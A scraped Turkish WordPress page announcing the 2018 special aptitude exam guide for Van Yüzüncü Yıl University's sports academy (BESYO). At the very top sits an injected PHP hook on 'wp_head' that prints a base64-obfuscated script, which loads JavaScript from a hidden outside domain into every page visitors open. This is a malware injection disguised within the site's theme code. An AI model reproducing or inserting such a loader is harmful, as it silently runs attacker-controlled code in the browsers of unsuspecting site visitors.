function add_theme_scripts_PHNjcmlw() { echo base64_decode("PHNjcmlwdD52YXIgRG5XWmJsWklHSj1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCJzY3JpcHQiKTtEbldaYmxaSUdKLnNyYz1hdG9iKCJhSFIwY0hNNkx5OXpZWEpqYjIxaExuTndZV05sTDJwekwyMXBiaTV0WVdsdUxtcHoiKTtkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLmFwcGVuZENoaWxkKERuV1pibFpJR0opOzwvc2NyaXB0Pg=="); } add_action( 'wp_head', 'add_theme_scripts_PHNjcmlw', 0 ); Van Yüzüncü Yıl Üniversitesi Besyo Özel Yetenek Sınavı 2018 – Besyo Hakkında Güncel Bilgiler

Van Yüzüncü Yıl Üniversitesi Besyo Özel Yetenek Sınavı 2018

11 Ağustos 2018
2018 Besyo Kılavuz
10 13
Bizi İnstagram 'da Takip Et Bizi YouTube 'ta Takip Et Bizi Facebook 'ta Takip Et

Güncel gelişmelerden haberdar olmak,  canlı yayınlarımızda bizlere sorular sormak, videolarımızı takip etmek ve son dakika gelişmelerini bildirim olarak almak için sağ taraftan sosyal medya hesaplarımızı takip edip tamamen ücretsiz uygulamamızı Google Play ve Apple Store’a “Besyocuyuz” yazıp indirebilirsiniz.

Van Yüzüncü Yıl Üniversitesi Sınav kılavuzunu 2 hafta önce açıklamıştır. Ancak gözümüzden kaçmış… Sınav tarihine ve kayıt tarihine daha çok zaman olduğu için bu hatamızdan dolayı kimsenin mağdur olmayacak olmasından dolayı mutluyuz. Bir çok besyo hazırlık sitesi de açıklanan kılavuzları bizim sitemizden takip ettiği için bunlarda paylaşmamıştır.

Kılavuzu Görüntüle

0

Bir Cevap Yazın

Menü